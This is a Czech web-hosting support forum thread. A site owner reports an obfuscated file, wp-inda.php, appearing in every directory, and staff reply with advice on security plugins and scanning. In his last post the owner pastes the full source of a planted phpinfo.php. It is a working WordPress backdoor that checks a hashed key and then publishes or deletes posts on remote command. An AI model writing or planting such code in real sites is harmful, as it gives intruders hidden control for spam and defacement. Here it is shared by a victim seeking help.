soubor wp-inda.php
Dobrý den,
ve všech adresářích na specialne.cz se začal objevovat soubor wp-inda.php
Obfuscation provided by Unknowndevice64 – Free Online PHP Obfuscator
http://www.ud64.com/
Tak se chci optat, zda je to v pořádku? Tento soubor jsem určitě nenahrával. Děkuji za informaci, přeji hezký den. Radek
3 Answers
Dobrý den,
případně tedy zvolte jiný bezpečnostní plugin podle svého CMS. Nebo proveďte antivirový sken souborů ve svém PC.
Případně také můžete kontaktovat někoho, kdo se zabývá odvirováním webů, tím se my nezabýváme a tak nemůžeme dát zaručený tip.
Dobrý den,
pokud používáte WordPress, raději si nainstalujte nějaký bezpečnostní plugin a proveďte sken webu. Třeba Wordfence.
Dobrý den,
určitě na webhostingu nepoužívám WordPress, navíc se soubor nacházel na všech subdomenách a v každém adresaři, provedl jsem vymaz nepotřebných subdomen a prošel jsem všechny složky a smazal jsem tedy wp-inda.php, narazil jsem i na podivný soubor phpinfo.php, tak vám projistotu posílám obsah:
„phpinfo.php“
<?php
if(md5(@$_GET[„api_key“]) != ‚f2745b0fbeb79404967de8381fefb0a0‘)
{
exit();
}
include „wp-load.php“;
if(@$_POST[„proc“] == „new_post“)
{
$categories = get_categories();
$category_id = $categories[1]->term_id;
$postdate = ‚2010-02-23 18:57:33‘;
$my_post = array(
‚post_title‘ => wp_strip_all_tags(base64_decode(@$_POST[‚post_title‘])),
‚post_content‘ => stripslashes(@$_POST[‚post_content‘]),
‚post_status‘ => ‚publish‘,
‚post_author‘ => 1,
‚post_date‘ => $postdate,
‚post_category‘ => array($category_id)
);
$post_id = wp_insert_post($my_post);
if($post_id)
{
echo $post_id;
}
}elseif(@$_POST[„proc“] == „delete_post“){
if(wp_delete_post($_POST[„post_id“], true))
{
echo ‚success‘;
}
}elseif(@$_POST[„proc“] == „check“)
{
echo ‚success‘;
}
„konec souboru phpinfo.php“
Budu tedy sledovat, zda se tyto aktivity budou znovu opakovat a když tak bych se ozval, děkuji za info a přeji hezký den Radek